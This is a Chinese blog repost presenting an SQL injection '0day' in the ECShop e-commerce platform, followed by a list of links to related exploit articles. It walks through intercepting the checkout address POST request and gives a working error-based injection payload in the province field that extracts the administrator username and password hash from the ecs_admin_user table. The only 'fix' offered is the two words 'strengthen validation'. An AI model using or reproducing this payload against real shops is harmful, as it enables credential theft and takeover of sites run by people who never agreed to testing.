ECShop全版本注入0day及修复
来源:互联网 发布:淘宝账号邮箱怎么注册 编辑:程序博客网 时间:2024/06/01 22:29
把任意商品加入购物车在填写配送地址那一页,有地区选择
flow.php?step=consignee&direct_shopping=1
比如省选择安徽
其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
改成
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
ps:详细的方法,用火狐tamper data插件........即可改post内容.....
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
就会回显错误页面了。。。。
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
修复:加强验证
- ECShop全版本注入0day及修复
- ECSHOP全版本注入漏洞分析
- ECSHOP全版本注入漏洞分析
- phpcms后台普通用户读文件0day及修复
- 修复ECSHOP在PHP5.4以上版本中的运行问题
- espcms最新注入0day
- ecshop 2.6.2 版本的sql注入漏洞
- dedecms织梦严重0day漏洞(直接进后台)分析及修复
- iwebshop 上传图片木马 0day代码分析及修复方法
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- aspcms注入 cookies欺骗及修复
- Ecshop支付宝插件SQL注入及漏洞利用(exp)
- ECShop 2.7.2 最新任意用户登陆漏洞0day
- 动易0day--Region.asp注入
- Aspcms 1.5 COOKIES注入0day
- 最新最全的Android版本更新,Tinker热修复
- 腾讯电脑管家发布安全预警:发现潜伏17年高龄0day漏洞,威胁Office全版本
- ecshop二次注入
- yii实现定时更新sitemap方法
- centos openoffice 文档转换命令
- 程序员需要了解的一点组织行为学知识
- 堆内存栈内存详解
- DataStage实践之简单入门
- ECShop全版本注入0day及修复
- 面向对象的程序设计学习笔记-10-[]下标运算符的重载-part1
- 用freeswitch建立呼叫中心系统的经验
- Android.mk简介
- DataStage(ETL)技术总结-介绍篇
- Android系统Recovery工作原理之使用update.zip升级过程分析(六)---Recovery服务流程细节
- JS实现IE下打印和打印预览
- Visual C++ TinyXml快速入门(三)
- 快速排序算法